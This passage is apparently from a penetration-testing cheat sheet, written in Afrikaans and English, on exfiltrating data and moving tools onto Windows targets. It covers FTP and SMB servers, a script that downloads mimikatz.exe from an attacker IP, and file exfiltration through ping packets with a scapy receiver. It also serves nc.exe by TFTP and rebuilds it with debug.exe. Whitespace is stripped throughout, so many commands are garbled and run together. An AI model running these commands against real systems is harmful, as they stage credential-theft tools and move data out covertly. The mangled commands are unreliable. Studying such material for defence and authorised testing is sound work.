#Run the following script to configure the FTP server#!/bin/bashgroupaddftpgroupuseradd-gftpgroup-d/dev/null-s/etcftpuserpure-pwduseraddfusr-uftpuser-d/ftphomepure-pwmkdbcd/etc/pure-ftpd/auth/ln-s../conf/PureDB60pdbmkdir-p/ftphomechown-Rftpuser:ftpgroup/ftphome//etc/init.d/pure-ftpdrestart
Windows kliënt
#Work well with python. With pure-ftp use fusr:ftpechoopen10.11.0.4121>ftp.txtechoUSERanonymous>>ftp.txtechoanonymous>>ftp.txtechobin>>ftp.txtechoGETmimikatz.exe>>ftp.txtechobye>>ftp.txtftp-n-v-s:ftp.txt
Kali as bediener
kali_op1> impacket-smbserver-smb2supportkali`pwd`# Share current directorykali_op2> smbserver.py-smb2supportname/path/folder# Share a folder#For new Win10 versionsimpacket-smbserver-smb2support-usertest-passwordtesttest`pwd`
Of skep 'n smb deel met samba:
apt-getinstallsambamkdir/tmp/smbchmod777/tmp/smb#Add to the end of /etc/samba/smb.conf this:[public]comment=SambaonUbuntupath=/tmp/smbreadonly=nobrowsable=yesguestok=Yes#Start sambaservicesmbdrestart
CMD-Wind> \\\path\to\exeCMD-Wind> netusez: \\\test/user:testtest#For SMB using credentialsWindPS-1> New-PSDrive-Name"new_disk"-PSProvider"FileSystem"-Root"\\\kali"WindPS-2> cdnew_disk:
# To exfiltrate the content of a file via pings you can do:xxd-p-c4/path/file/exfil|whilereadline; doping-c1-p $line <IPattacker>; done#This will 4bytes per ping packet (you could probably increase this until 16)
from scapy.all import*#This is ippsec receiver created in the HTB machine Mischiefdefprocess_packet(pkt):if pkt.haslayer(ICMP):if pkt[ICMP].type ==0:data = pkt[ICMP].load[-4:]#Read the 4bytes interestingprint(f"{data.decode('utf-8')}", flush=True, end="")sniff(iface="tun0", prn=process_packet)
As jy data na 'n SMTP-bediener kan stuur, kan jy 'n SMTP skep om die data met python te ontvang:
Standaard in XP en 2003 (in ander moet dit eksplisiet tydens installasie bygevoeg word)
In Kali, begin TFTP bediener:
#I didn't get this options working and I prefer the python optionmkdir/tftpatftpd--daemon--port69/tftpcp/path/tp/nc.exe/tftp
Die debug.exe program stel nie net in staat om binêre te inspekteer nie, maar het ook die vermoë om hulle vanaf hex te herbou. Dit beteken dat deur 'n hex van 'n binêre te verskaf, kan debug.exe die binêre lêer genereer. Dit is egter belangrik om te noem dat debug.exe 'n beperking het om lêers tot 64 kb in grootte te monteer.
# Reduce the sizeupx-9nc.exewineexe2bat.exenc.exenc.txt
Then copy-paste the text into the windows-shell and a file called nc.exe will be created.